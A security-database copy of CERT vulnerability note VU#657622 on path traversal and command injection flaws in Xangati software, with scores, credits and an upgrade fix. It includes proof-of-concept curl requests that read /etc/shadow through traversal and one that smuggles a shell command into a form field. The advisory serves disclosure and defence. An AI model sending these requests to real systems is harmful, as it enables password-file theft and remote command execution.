Executive Summary



This Alert is flagged as TOP 25 Common Weakness Enumeration from CWE/SANS. For more information, you can read this.
Summary
Title Xangati software release contains relative path traversal and command injection vulnerabilities
Informations
Name VU#657622 First vendor Publication 2014-04-14
Vendor VU-CERT Last vendor Modification 2014-04-14
Severity (Vendor) N/A Revision M

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Cvss Base Score 9 Attack Range Network
Cvss Impact Score 10 Attack Complexity Low
Cvss Expoit Score 8 Authentication Requires single instance
Calculate full CVSS 2.0 Vectors scores

Detail

Vulnerability Note VU#657622

Xangati software release contains relative path traversal and command injection vulnerabilities

Original Release date: 14 Apr 2014 | Last revised: 14 Apr 2014

Overview

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

Description

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.

curl -i -s -k  -X 'POST'\
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25'\
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow'\
'hxxps://127.10.10.5/servlet/MGConfigData'

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5

curl -i -s -k  -X 'POST'\
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25'\
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow'\
'hxxps://127.10.10.5/servlet/Installer'

curl -i -s -k  -X 'POST'\
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25'\
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow'\
'hxxps://127.10.10.5/servlet/MGConfigData'

CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.

curl -i -s -k  -X 'POST'\
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25'\
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES'\
'hxxps://127.10.10.5/servlet/Installer'

The CVSS score below is for CVE-2014-0359.

Impact

A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.

Solution

Apply an Update

Upgrade to XSR11 or XNR 7 for the appropriate product..

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Xangati IncAffected23 Jan 201411 Apr 2014
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

GroupScoreVector
Base9.4AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal8.2E:ND/RL:OF/RC:C
Environmental2.1CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

  • https://cwe.mitre.org/data/definitions/78.html
  • https://cwe.mitre.org/data/definitions/23.html
  • http://xangati.com/products/

Credit

Thanks to Jan Kadijk for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs:CVE-2014-0358CVE-2014-0359
  • Date Public:14 Apr 2014
  • Date First Published:14 Apr 2014
  • Date Last Updated:14 Apr 2014
  • Document Revision:11

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Original Source

Url : http://www.kb.cert.org/vuls/id/657622

CWE : Common Weakness Enumeration

% Id Name
50 % CWE-78 Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection') (CWE/SANS Top 25)
50 % CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE/SANS Top 25)

CPE : Common Platform Enumeration

TypeDescriptionCount
Application 1
Application 1

Alert History

If you want to see full details history, please login or register.
0
1
2
Date Informations
2014-04-16 13:27:44
  • Multiple Updates
2014-04-15 17:23:36
  • Multiple Updates
2014-04-15 00:19:25
  • First insertion